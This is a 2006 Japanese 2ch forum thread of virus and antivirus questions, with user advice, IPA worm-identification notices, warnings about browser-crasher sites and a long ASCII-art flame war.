1 :
名無しさん@お腹いっぱい。 :
2006/11/15(水) 10:49:54
2 :
名無しさん@お腹いっぱい。 :2006/11/15(水) 10:50:33
3 :
名無しさん@お腹いっぱい。 :2006/11/15(水) 10:51:04
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
4 :
名無しさん@お腹いっぱい。 :2006/11/15(水) 10:51:37
5 :
名無しさん@お腹いっぱい。 :2006/11/15(水) 10:52:30
6 :
名無しさん@お腹いっぱい。 :2006/11/15(水) 10:53:00
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html ・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html ・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
7 :
名無しさん@お腹いっぱい。 :2006/11/15(水) 10:53:32
8 :
名無しさん@お腹いっぱい。 :2006/11/15(水) 10:54:09
9 :
名無しさん@お腹いっぱい。 :2006/11/15(水) 10:55:18
テンプレここまで ∧_∧ ( ・∀・) トロイ〜ワーム!!! ( ⊃┳⊃ ε(_)ヘ⌒ヽフ ( ( ・ω・) ≡≡≡ ◎―◎⊃⊃ テンプレここまで
前スレの質問の続きです。 avast!4.7を使っていますが、 踏むとウィルスに感染するURLを踏んだ場合、 踏む→感染→avastが検出→削除→削除はできたがPCに有害 ↑ ここでPCに害をもたらす(削除するまでの間に) これが私の見解です。 それともavastが入っているので感染しないので無害なのでしょうか? ご回答宜しくお願いします。
headline-news.tripod.com と strangeworld はブラクラ登録推奨
newsheadline.tripod.comもな
17 :
名無しさん@お腹いっぱい。 :2006/11/15(水) 16:13:50
前スレでリンクチェッカーを知りました。 で、さっそく使いたいのですが、スレイプ似るでもOKですか? なぜか右クリックしても、Dr.WEB で検査、の表示が出ていません。 プ似るでの設定方法を御教示ください。
>>10 Avast!に限らず、どのアンチウイルスソフトでも安全とは言い切れない。
だから、少しでもリスクを低減したい人は、以下のようなセキュリティ環境で対応。
・高検出力の非・常駐アンチウイルスソフト
・非・常駐アンチスパイウェアソフト(検出・駆除・予防)
・IEエンジン以外のブラウザ
・PFW(アウトバウンド監視)
君の場合は、まず知識不足を補おうとする自助努力が足りないんじゃない?
Avast!はWeb閲覧時、マルウェアの侵入をブロックするWebシールド機能が
あるはず、ブロックできれば感染しないし・無害。リンク先のマルウェアの有無を確かめる
ことはできない。というかそういった機能をもったアンチウイルスソフトはないん
じゃないかな?必要なら、前スレで紹介されたものを利用するしかない。
>>17 IE用をインストールして再起動すれば使えると思うけど。
できなかったとしても、Sleipnirの右クリックメニューが弄くれれば・・・
私はOperaと2ch専ブラから利用、外出先のノーガードPC利用時には↓でチェック。
http://online.drweb.com/?url=1
あーあ、いい事言ってるのに >君の場合は、まず知識不足を補おうとする自助努力が足りないんじゃない? このひとことが 「おれって物知りでやるだろ」 的な状態をよくあらわしちゃってるよ〜 能ある鷹は爪を隠す、というではないか。 無知な相手に威張ったところで、なにも得られるものはない。 もっと大物になってほしい。
22 :
17 :2006/11/15(水) 21:16:50
>20 ありがとう
>>21 何故そういった解釈しかできない
まぁ正直、何の見返りもない慈善行為に精を出すほどできた人間ではないので
優越感に浸っていることは否定しないけど。
レスをつける相手にもよるが、これも2chQ&A掲示板特有のgive & takeということで
許してほしい _ト ̄|○
>>23 >何故そういった解釈しかできない
簡単な事さ。
>give & take
2ちゃんに限らず、世の中は最低でも give & take ばかり。
あんたは博識だ。ゆえに give & give ができる人間になってほしかった。
優越感という感情は
「善良という名の精神を滅ぼす麻薬」
のような快感だけであることに気付いてほしかった。
それだけのことさ。
ウィルス情報質問 総合スレッド★Part39
>>24 私の将来を案じてくれるのはありがたいが、優越感無しに生きれると
信じれるほどまっさらな人間ではないので、残念ながら手遅れです。
博識でも無いし、Give&Giveでは今日の夕食すら危うい人間です。
人の善意をそのままに受け取れない君の将来のほうが不安で仕方ありません。
スレ汚し&駄文申し訳ありませんでした。
>>26 >人の善意をそのままに受け取れない
なるほど。自分のした行為が真の善意か偽善か見極められない人物だったか。
どうやら、おれの思い込み違いだったようだな。
おれの将来を心配してくれてありがとう。
おれは馬鹿で単細胞で無知な男だ。
だが、それでもおれを愛してくれるやつらがいるのでおれは幸せだと思ってる。
では、おれもこれにて失礼するよ。さらばじゃ。
乙であります
>>27 スレ汚しついでに更に汚します。
あらゆる行為において内在的に優越感というものはあります。
善意というものは結果的に相手をよい方向に導くということであって、
そこに優越感や自慰的行為であっても悪いことではありません。
すなわち、他者から偽善であるといわれようが結果的に善意になれば
いいのです。そもそも見ず知らずの相手に対する善意は偽善と
思ってもかまいません。「真の善意」「善良という名の精神を滅ぼす麻薬」
といった陳腐な言葉に酔いしれていないで、もっと内面を見つめ直したほうが
いいと思いますよ。もちろんこれは、悪意も含んでます。
セキュ板でやるな
>>31 おまいは根本的な事を勘違いしてる。
>>27 は、おまいの内面の事を言ってるんだと思うよ。
そして、いま最も正しのは
>>32 の
>セキュ板でやるな
あはは
34 :
10 :2006/11/15(水) 23:44:35
ブラクラです
リンクに tripod が入ってる場合は要注意です。^^
37 :
10 :2006/11/16(木) 00:00:58
38 :
27 :2006/11/16(木) 00:09:36
>>33 分かってる。否定してない。
前スレで
>>10 とやり取りした本人じゃなきゃわからんことを
妙な勘繰りいれて、手前勝手に「大物」「Give&Give」になれとか、図々しいんだよ。
よくさあVIPでやれとかの誘導レスあるけど、これはどこに誘導していいのかわからんなw
>>38 君の悔しい気持ちはわかったので
君もそろそろ、その図々しいやつを見習っておさらばしなよ。シツコスギ
あ〜やってらんね ... 空虚
\ U / \ U / / ̄ ̄ ヽ, / ', / _/\/\/\/|_ \ ノ//, {0} /¨`ヽ {0} ,ミヽ / \ / \ / く l ヽ._.ノ ', ゝ \ < バーカ! > / /⌒ リ `ー'′ ' ⌒\ \ / \ (  ̄ ̄⌒ ⌒ ̄ _)  ̄|/\/\/\/ ̄ ` ̄ ̄`ヽ /´ ̄ | | −−− ‐ ノ | / ノ −−−− / ∠_ −− | f\ ノ  ̄`丶. | | ヽ__ノー─-- 、_ ) − _ . | | / / | | ,' / / / ノ | ,' \ / / | / \ /_ノ / ,ノ 〈 \ ( 〈 ヽ.__ \ \ ヽ._> \__)
(*´д`*)まなべええええええええええええええええええええ
/⌒ヽ ⊂二二二( ^ω^)二⊃ | / ブーン ( ヽノ ノ>ノ 三 レレ
-- 「2006/11/14 9:52」のキャッシュをチェックしています。 --
注意!ループタグを発見! (3)
注意!逃げウィンドウを発見! (1)
注意!ゾンビ ウィンドウを発見! (1)
ブラクラチェックが終了しました。
※ windowオープンを発見しました。(8)
payout.htm
http://www.topsites.com.br/cgi-bin/top69/vote?id=2515 payout.htm
※ インラインフレームタグを発見しました。 (2)
analsex-allpics.htm
上記アドレスのチェックもお勧めします。(そのままチェックできます。)
--レスポンスヘッダ--
HTTP/1.1 200 OK
Date: Tue, 14 Nov 2006 00:51:56 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=ISO-8859-1
SCO-Hash: 5ab69771c748a6a6aae9ef6189cb5648
[キャッシュ(5.3 KB) 削除 / 検索] [このアドレスの安全度 81%] [RSS]
つまんね ( ( ,,.r'' ゛~~` ''ッ,, ダリィんだよね ) ) 、 ゛ ,,,,,,,,,,,,,,,,,,,,, ヾ. バカアイテニスンノ ,.、 / / ミ ミ゛,へ.__, ,_ノヽ i. .| |l l ,´ ミ ミ, ( ・) {・フ 〉 ミ. _-、i::| |ニニii ' 、,,,,ツi: ミ,`~´ ヽ~〈 .ミ /,‐ヽヽ`、|| 、シ`` i: ,ゞ 'n.inヽ. .ミ ( .〉〉/ シ // ミ` l.l ヽ"、 / ノ ミ/ シ 彡 ,=こ二=.{ ミ,, ,r'´ ,,、'゛ ミi. / / ' ! w、`~^' vwv '、 ミ 〃 .ミ .ミ / i: / `^^ \ ." 〃 ミ .ミ.:/ / / i: v ! ,, \ 、 〃 ミ :i; .i: w !! ミ!: ミ \\( ⌒ヽ :i; / i: !! .ミ キ , ⌒`、_ ) ) :il .i: ! w! ミ .:i. (_ ( _,ノ ) , :il ! i: ! ,〃゛ キ ゞ、 __, ノ , .:il ! /~~````` " '''' = ‐- 、ミ _,,,,_ミ, il ` ー ´ :il ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、 ゞ、 ` 〃 ゝ、wx.mn.!!++ナ'~ ヾ~ヽ、 ヽ、 ,, ~^^}´ 彡 〃 〃 }} /〉.〉〉〉i''" 〃 彡、 {{ 〃,__!////l | 〃 X,, 》. ≪.__`‐'.' '´,Uwwvw'、...,,,___ ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
>>46 のリンク先はセクシーショットというより、すでグロの領域
50 :
名無しさん@お腹いっぱい。 :2006/11/16(木) 02:17:51
マカフィーのウィルス対策とスパイウェアのやつインストールしたらかなり重くなって少しいらいらします・・・ そんなもんですかね、せっかく光入れたのに。
( ( ,,.r'' ゛~~` ''ッ,, スレタイヨメヨ ) ) 、 ゛ ,,,,,,,,,,,,,,,,,,,,, ヾ. ,.、 / / ミ ミ゛,へ.__, ,_ノヽ i. .| |l l ,´ ミ ミ, ( ・) {・フ 〉 ミ. _-、i::| |ニニii ' 、,,,,ツi: ミ,`~´ ヽ~〈 .ミ /,‐ヽヽ`、|| 、シ`` i: ,ゞ 'n.inヽ. .ミ ( .〉〉/ シ // ミ` l.l ヽ"、 / ノ ミ/ シ 彡 ,=こ二=.{ ミ,, ,r'´ ,,、'゛ ミi. / / ' ! w、`~^' vwv '、 ミ 〃 .ミ .ミ / i: / `^^ \ ." 〃 ミ .ミ.:/ / / i: v ! ,, \ 、 〃 ミ :i; .i: w !! ミ!: ミ \\( ⌒ヽ :i; / i: !! .ミ キ , ⌒`、_ ) ) :il .i: ! w! ミ .:i. (_ ( _,ノ ) , :il ! i: ! ,〃゛ キ ゞ、 __, ノ , .:il ! /~~````` " '''' = ‐- 、ミ _,,,,_ミ, il ` ー ´ :il ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、 ゞ、 ` 〃 ゝ、wx.mn.!!++ナ'~ ヾ~ヽ、 ヽ、 ,, ~^^}´ 彡 〃 〃 }} /〉.〉〉〉i''" 〃 彡、 {{ 〃,__!////l | 〃 X,, 》. ≪.__`‐'.' '´,Uwwvw'、...,,,___ ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
なんか最近、 再起動しますか? とか聞きながら5分くらいカウントダウンしていくウイルスっぽいのに感染しました><。。 どうしたらいいですかね?
53 :
名無しさん@お腹いっぱい。 :2006/11/16(木) 03:16:07
ageておきます
ゲームをしていてまったく気が付かなかったんですが、 良く見ると警告文らしきものはウインドウズの自動更新後の再起動の通知でした(;´Д`) 以前似たような再起動ウィルスに感染した事があったので、またかと早とちりしてしまいました。 お騒がせしました。吊ってきます・・・
なるほど。吊るほどじゃないよ。
>だが、それでもおれを愛してくれるやつらがいるのでおれは幸せだと思ってる。 タシャト ヒカクシタ ウエデノ ユウエツカンニ ,,.r'' ゛~~` ''ッ,, シアワセヲ カンジテル 、 ゛ ,,,,,,,,,,,,,,,,,,,,, ヾ. トイウコト ,.、 / / ミ ミ゛,へ.__, ,_ノヽ i. .| |l l ,´ ミ ミ, ( ・) {・フ 〉 ミ. _-、i::| |ニニii ' 、,,,,ツi: ミ,`~´ ヽ~〈 .ミ /,‐ヽヽ`、|| 、シ`` i: ,ゞ 'n.inヽ. .ミ ( .〉〉/ シ // ミ` l.l ヽ"、 / ノ ミ/ シ 彡 ,=こ二=.{ ミ,, ,r'´ ,,、'゛ ミi. / / ' ! w、`~^' vwv '、 ミ 〃 .ミ .ミ / i: / `^^ \ ." 〃 ミ .ミ.:/ / / i: v ! ,, \ 、 〃 ミ :i; .i: w !! ミ!: ミ \\( ⌒ヽ :i; / i: !! .ミ キ , ⌒`、_ ) ) :il .i: ! w! ミ .:i. (_ ( _,ノ ) , :il ! i: ! ,〃゛ キ ゞ、 __, ノ , .:il ! /~~````` " '''' = ‐- 、ミ _,,,,_ミ, il ` ー ´ :il ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、 ゞ、 ` 〃 ゝ、wx.mn.!!++ナ'~ ヾ~ヽ、 ヽ、 ,, ~^^}´ 彡 〃 〃 }} /〉.〉〉〉i''" 〃 彡、 {{ 〃,__!////l | 〃 X,, 》. ≪.__`‐'.' '´,Uwwvw'、...,,,___ ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
ゼンイト ギゼンハ ,,.r'' ゛~~` ''ッ,, タシャノ ヒョウカ 、 ゛ ,,,,,,,,,,,,,,,,,,,,, ヾ. ヒョウリイッタイ ,.、 / / ミ ミ゛,へ.__, ,_ノヽ i. .| |l l ,´ ミ ミ, ( ・) {・フ 〉 ミ. _-、i::| |ニニii ' 、,,,,ツi: ミ,`~´ ヽ~〈 .ミ /,‐ヽヽ`、|| 、シ`` i: ,ゞ 'n.inヽ. .ミ ( .〉〉/ シ // ミ` l.l ヽ"、 / ノ ミ/ シ 彡 ,=こ二=.{ ミ,, ,r'´ ,,、'゛ ミi. / / ' ! w、`~^' vwv '、 ミ 〃 .ミ .ミ / i: / `^^ \ ." 〃 ミ .ミ.:/ / / i: v ! ,, \ 、 〃 ミ :i; .i: w !! ミ!: ミ \\( ⌒ヽ :i; / i: !! .ミ キ , ⌒`、_ ) ) :il .i: ! w! ミ .:i. (_ ( _,ノ ) , :il ! i: ! ,〃゛ キ ゞ、 __, ノ , .:il ! /~~````` " '''' = ‐- 、ミ _,,,,_ミ, il ` ー ´ :il ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、 ゞ、 ` 〃 ゝ、wx.mn.!!++ナ'~ ヾ~ヽ、 ヽ、 ,, ~^^}´ 彡 〃 〃 }} /〉.〉〉〉i''" 〃 彡、 {{ 〃,__!////l | 〃 X,, 》. ≪.__`‐'.' '´,Uwwvw'、...,,,___ ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
,,.r'' ゛~~` ''ッ,, ギゼンシャ? 、 ゛ ,,,,,,,,,,,,,,,,,,,,, ヾ. イイデスヨベツニ ,.、 / / ミ ミ゛,へ.__, ,_ノヽ i. アクニテッシマスカラ .| |l l ,´ ミ ミ, ( ・) {・フ 〉 ミ. _-、i::| |ニニii ' 、,,,,ツi: ミ,`~´ ヽ~〈 .ミ /,‐ヽヽ`、|| 、シ`` i: ,ゞ 'n.inヽ. .ミ ( .〉〉/ シ // ミ` l.l ヽ"、 / ノ ミ/ シ 彡 ,=こ二=.{ ミ,, ,r'´ ,,、'゛ ミi. / / ' ! w、`~^' vwv '、 ミ 〃 .ミ .ミ / i: / `^^ \ ." 〃 ミ .ミ.:/ / / i: v ! ,, \ 、 〃 ミ :i; .i: w !! ミ!: ミ \\( ⌒ヽ :i; / i: !! .ミ キ , ⌒`、_ ) ) :il .i: ! w! ミ .:i. (_ ( _,ノ ) , :il ! i: ! ,〃゛ キ ゞ、 __, ノ , .:il ! /~~````` " '''' = ‐- 、ミ _,,,,_ミ, il ` ー ´ :il ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、 ゞ、 ` 〃 ゝ、wx.mn.!!++ナ'~ ヾ~ヽ、 ヽ、 ,, ~^^}´ 彡 〃 〃 }} /〉.〉〉〉i''" 〃 彡、 {{ 〃,__!////l | 〃 X,, 》. ≪.__`‐'.' '´,Uwwvw'、...,,,___ ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
どうした?朝からやけに哲学してるな。サル姿がなんだが。
,,.r'' ゛~~` ''ッ,,
>>21 >>46 ノウイルスニカンセン
、 ゛ ,,,,,,,,,,,,,,,,,,,,, ヾ. シタンダヨ! ,.、 / /
ミ ミ゛,へ.__, ,_ノヽ i. .| |l l ,´
ミ ミ, ( ・) {・フ 〉 ミ. _-、i::| |ニニii '
、,,,,ツi: ミ,`~´ ヽ~〈 .ミ /,‐ヽヽ`、||
、シ`` i: ,ゞ 'n.inヽ. .ミ ( .〉〉/
シ // ミ` l.l ヽ"、 / ノ
ミ/ シ 彡 ,=こ二=.{ ミ,, ,r'´ ,,、'゛
ミi. / / ' ! w、`~^' vwv '、 ミ 〃 .ミ
.ミ / i: / `^^ \ ." 〃 ミ
.ミ.:/ / / i: v ! ,, \ 、 〃 ミ
:i; .i: w !! ミ!: ミ \\( ⌒ヽ
:i; / i: !! .ミ キ , ⌒`、_ ) )
:il .i: ! w! ミ .:i. (_ ( _,ノ ) ,
:il ! i: ! ,〃゛ キ ゞ、 __, ノ ,
.:il ! /~~````` " '''' = ‐- 、ミ _,,,,_ミ, il ` ー ´
:il ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、 ゞ、 ` 〃
ゝ、wx.mn.!!++ナ'~ ヾ~ヽ、 ヽ、 ,, ~^^}´
彡 〃 〃 }} /〉.〉〉〉i''" 〃
彡、 {{ 〃,__!////l | 〃
X,, 》. ≪.__`‐'.' '´,Uwwvw'、...,,,___
^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
,,.r'' ゛~~` ''ッ,, Peaceキレタ 、 ゛ ,,,,,,,,,,,,,,,,,,,,, ヾ. 7イッテクル ,.、 ミ ミ゛,へ.__, ,_ノヽ i. マタクル .| |l ミ ミ, ( ・) {・フ 〉 ミ. _-、i::| | 、,,,,ツi: ミ,`~´ ヽ~〈 .ミ /,‐ヽヽ`、|| 、シ`` i: ,ゞ 'n.inヽ. .ミ ( .〉〉/ シ // ミ` l.l ヽ"、 / ノ ミ/ シ 彡 ,=こ二=.{ ミ,, ,r'´ ,,、'゛ ミi. / / ' ! w、`~^' vwv '、 ミ 〃 .ミ .ミ / i: / `^^ ." 〃 ミ .ミ.:/ / / i: v ! ,, 、 〃 ミ :i; .i: w !! ミ!: ミ ミ ミ :i; / i: !! .ミ キ , ミ :il .i: ! w! ミ .:i. _ , ミ :il ! i: ! ,〃゛ キ ゞ、 ミ .:il ! /~~````` " '''' = ‐- 、ミ _,,,,_ミ, il ` ´ :il ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、 ゞ、 ` 〃 ゝ、wx.mn.!!++ナ'~ ヾ~ヽ、 ヽ、 ,, ~^^}´ 彡 〃 〃 }} /〉.〉〉〉i''" 〃 彡、 {{ 〃,__!////l | 〃 X,, 》. ≪.__`‐'.' '´,Uwwvw'、...,,,___ ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
違法ダウソ物のフォトショとイラレを見つけたんだが ウイルスチェックしたいんですがフリーのダウソ済みファイルのウイルスチェックソフト 教えて下さい!!
,,.r'' ゛~~` ''ッ,, ジュウヨウナコトハ 、 ゛ ,,,,,,,,,,,,,,,,,,,,, ヾ. ナイザイテキシンリヲ ,.、 / / ミ ミ゛,へ.__, ,_ノヽ i. キョゼツシナイコト .| |l l ,´ ミ ミ, ( ・) {・フ 〉 ミ. _-、i::| |ニニii ' 、,,,,ツi: ミ,`~´ ヽ~〈 .ミ /,‐ヽヽ`、|| 、シ`` i: ,ゞ 'n.inヽ. .ミ ( .〉〉/ シ // ミ` l.l ヽ"、 / ノ ミ/ シ 彡 ,=こ二=.{ ミ,, ,r'´ ,,、'゛ ミi. / / ' ! w、`~^' vwv '、 ミ 〃 .ミ .ミ / i: / `^^ \ ." 〃 ミ .ミ.:/ / / i: v ! ,, \ 、 〃 ミ :i; .i: w !! ミ!: ミ \\( ⌒ヽ :i; / i: !! .ミ キ , ⌒`、_ ) ) :il .i: ! w! ミ .:i. (_ ( _,ノ ) , :il ! i: ! ,〃゛ キ ゞ、 __, ノ , .:il ! /~~````` " '''' = ‐- 、ミ _,,,,_ミ, il ` ー ´ :il ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、 ゞ、 ` 〃 ゝ、wx.mn.!!++ナ'~ ヾ~ヽ、 ヽ、 ,, ~^^}´ 彡 〃 〃 }} /〉.〉〉〉i''" 〃 彡、 {{ 〃,__!////l | 〃 X,, 》. ≪.__`‐'.' '´,Uwwvw'、...,,,___ ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
,,.r'' ゛~~` ''ッ,, ドウトクヤ リンリヲトキタガルヤツハ 、 ゛ ,,,,,,,,,,,,,,,,,,,,, ヾ. キョゼツシガチナ ,.、 / / ミ ミ゛,へ.__, ,_ノヽ i. リソウシュギシャ .| |l l ,´ ミ ミ, ( ・) {・フ 〉 ミ. _-、i::| |ニニii ' 、,,,,ツi: ミ,`~´ ヽ~〈 .ミ /,‐ヽヽ`、|| 、シ`` i: ,ゞ 'n.inヽ. .ミ ( .〉〉/ シ // ミ` l.l ヽ"、 / ノ ミ/ シ 彡 ,=こ二=.{ ミ,, ,r'´ ,,、'゛ ミi. / / ' ! w、`~^' vwv '、 ミ 〃 .ミ .ミ / i: / `^^ \ ." 〃 ミ .ミ.:/ / / i: v ! ,, \ 、 〃 ミ :i; .i: w !! ミ!: ミ \\( ⌒ヽ :i; / i: !! .ミ キ , ⌒`、_ ) ) :il .i: ! w! ミ .:i. (_ ( _,ノ ) , :il ! i: ! ,〃゛ キ ゞ、 __, ノ , .:il ! /~~````` " '''' = ‐- 、ミ _,,,,_ミ, il ` ー ´ :il ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、 ゞ、 ` 〃 ゝ、wx.mn.!!++ナ'~ ヾ~ヽ、 ヽ、 ,, ~^^}´ 彡 〃 〃 }} /〉.〉〉〉i''" 〃 彡、 {{ 〃,__!////l | 〃 X,, 》. ≪.__`‐'.' '´,Uwwvw'、...,,,___ ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
∧_∧ ( ´∀`) ( ) ボク、Berry CD使ってます | | | (__)_)
∧_∧ ( ´∀`) ( ) | | | (__)_)
∧_∧ ( ´∀`) ( )< | | | (__)_)
∧_∧ ( ´∀`) ( )< | | | (__)_)
テ、テスト!
∧_∧ ( ´∀`) ( ) 面白い www | | | (__)_)
Realならしょうがない
なんということだ、RealMediaふぁいるは、まだまだエロ動画サイトで現役なのだぞ。
79 :
名無しさん@お腹いっぱい。 :2006/11/17(金) 20:16:26
ソースネクストのウィルスセキュリティzeroってどうですか?
81 :
名無しさん@お腹いっぱい。 :2006/11/17(金) 21:22:33
/ , - ' 最近 ( ( ,,.r'' ゛~~` ''ッ,, どーも ) ) 、 ゛ ,,,,,,,,,,,,,,,,,,,,, ヾ. ダリィんだよね ,.、 / / ミ ミ゛,へ.__, ,_ノヽ i. .| |l l ,´ ミ ミ, ( ・) {・フ 〉 ミ. _-、i::| |ニニii ' 、,,,,ツi: ミ,`~´ ヽ~〈 .ミ /,‐ヽヽ`、|| 、シ`` i: ,ゞ 'n.inヽ. .ミ ( .〉〉/ シ // ミ` l.l ヽ"、 / ノ ミ/ シ 彡 ,=こ二=.{ ミ,, ,r'´ ,,、'゛ ミi. / / ' ! w、`~^' vwv '、 ミ 〃 .ミ .ミ / i: / `^^ \ ." 〃 ミ .ミ.:/ / / i: v ! ,, \ 、 〃 ミ :i; .i: w !! ミ!: ミ \\( ⌒ヽ :i; / i: !! .ミ キ , ⌒`、_ ) ) :il .i: ! w! ミ .:i. (_ ( _,ノ ) , :il ! i: ! ,〃゛ キ ゞ、 __, ノ , .:il ! /~~````` " '''' = ‐- 、ミ _,,,,_ミ, il ` ー ´ :il ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、 ゞ、 ` 〃 ゝ、wx.mn.!!++ナ'~ ヾ~ヽ、 ヽ、 ,, ~^^}´ 彡 〃 〃 }} /〉.〉〉〉i''" 〃 彡、 {{ 〃,__!////l | 〃 X,, 》. ≪.__`‐'.' '´,Uwwvw'、...,,,___ ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
もうすぐウィルスバスターの無料お試しが切れるのですが、 ダウンロード版を購入するとき、どうやって料金を払うのですか? また、ダウンロード版と店頭購入版とでは、 どちらがインストールのやり方がわかりやすいですか? 当方初心者なもので宜しくお願いします。
誰が宣伝しろといったよ?
>>90 SMAPのありがとう
PC無害、精神的有害
わろす
【使用OS】XP 【WINDOWS UPDATE】している 【ウィルスソフト】Avast 【UPDATE】している 【スキャン】Avast+オンラインウィルスチェック(trendmicro)でしている 【症状】 Avastではウィルス反応がなかったので オンラインウィルスチェック(trendmicro)をしたらウィルス感染していた 【やったこと】 ゲームをインストールしたらそのゲームのexeファイルが BKDR_Genericというウィルス(バックドア型?)に感染しているといわれた ゲーム自体は普通にできる 【とった処置】 まだなにもしていない ゲームが普通にできるウィルスはあるのですか?
95 :
93 :2006/11/18(土) 10:50:10
>>94 教えていただいたURLで調べてみます。
ありがとうございました。
>>96 はいはい、ご苦労さん。
海外のアダルトサイトで大量のポップアップとかクッキーとか
質問です
アドレスに「share」と書いてあるところはクリックしない方がいいでしょうか?
ttp://www.tyu2.com/ このサイトの無料で見れる動画を見たりしてるんですが
アドレスにshareと書いてあったり、無料で見れるのも何か怪しい気がするの
ですが、ココの動画はウィルスが付いてるかどうか調べてもらえないでしょうか?
スレ違いだったら申し訳ないですが。。
( ^ω^)
「近い将来にはコンピュータ攻撃で死者も」米McAfeeテラフィシ氏
http://internet.watch.impress.co.jp/cda/news/2006/11/20/13995.html 遅かれ早かれ、コンピュータ攻撃で死者が発生する」。米McAfeeのセキュリティ研究機関「AVERT(Anti-Virus Emergency Response Term) Labs」のディレクターを務めるジョー・テラフィシ氏が20日、
「セキュリティの未来」と題する講演を行ない、悪意のあるプログラムが医療機器や軍事兵器を狙い攻撃することで、人々の命が奪われる可能性があると語った。
「マルウェアを活用したサイバーテロは5年後には発生する」と語るテラフィシ氏は、「公共の利益を保護するためにセキュリティ研究組織が統合し、相互運用性を持つベンダー製品を提供すべき。
我々もシマンテックやトレンドマイクロなどと協力する必要がある」と話し、セキュリティ業界企業の協力を呼びかけた。
あぼーん
104 :
名無しさん@お腹いっぱい。 :2006/11/21(火) 06:38:16
Spyware:Cookie/Go Spyware:Cookie/Statcounter Spyware:Cookie/Com.com Spyware:Cookie/Rightmedia Spyware:Cookie/MediaTickets Spyware:Cookie/Com.com Spyware:Cookie/Errorguard Spyware:Cookie/64.62.232 Spyware:Cookie/360i Spyware:Cookie/2o7 Spyware:Cookie/Com.com Spyware:Cookie/Screensavers Spyware:Cookie/Ccbill Spyware:Cookie/Searchportal Spyware:Cookie/Gaytrafficbroker Spyware:Cookie/Toplist Spyware:Cookie/Hbmediapro Spyware:Cookie/Winantivirus Spyware:Cookie/ErrorSafe Spyware:Cookie/Outster Spyware:Cookie/adultfriendfinder Spyware:Cookie/ErrorSafe Spyware:Cookie/Reliablestats Spyware:Cookie/YieldManager Spyware:Cookie/DriveCleaner Spyware:Cookie/DriveCleaner Spyware:Cookie/2o7Spyware:Cookie/Winantivirus の30個。駆除できなかったスパイウェアなんですけど、 全部消した方が良いのでしょうか?放置しといても安全でしょうか? (消せるかわからないんですけど) よろしくお願いします。
106 :
名無しさん@お腹いっぱい。 :2006/11/21(火) 07:49:16
すれ違いかどうか微妙なのだが、英文で、マイクロソフトエクスプローラの名で 「スパイウエア対策の為にウルティメイトディフェンダーをインストールしますか?」と言う 文章がしつこく提示されるのだが、これは本当にマイクロソフトの仕様なの? それとも悪質な企業広告? キャンセルしても消えないんですけれど
108 :
名無しさん@お腹いっぱい。 :2006/11/21(火) 08:22:01
ヤバイ?しかしこのultimate defenderと言うソフトって無料じゃないんだよね。 実際この警告自体がトラップって事無いの?
109 :
名無しさん@お腹いっぱい。 :2006/11/21(火) 08:30:59
つーか、調べたら、このultimate defender自体が悪質な偽装セキュリティ広告らしいではないか。 危ない危ない。騙されるところだった。
110 :
名無しさん@お腹いっぱい。 :2006/11/21(火) 08:47:55
>>105 ありがとうございます。今クッキー消しました!!
>>110 _、_
( ,_ノ` )y━・~~~ < いいってことよ・・・
^^+( ω ) 見事な変装ですね。全然わからん
116 :
名無しさん@お腹いっぱい。 :2006/11/21(火) 22:47:27
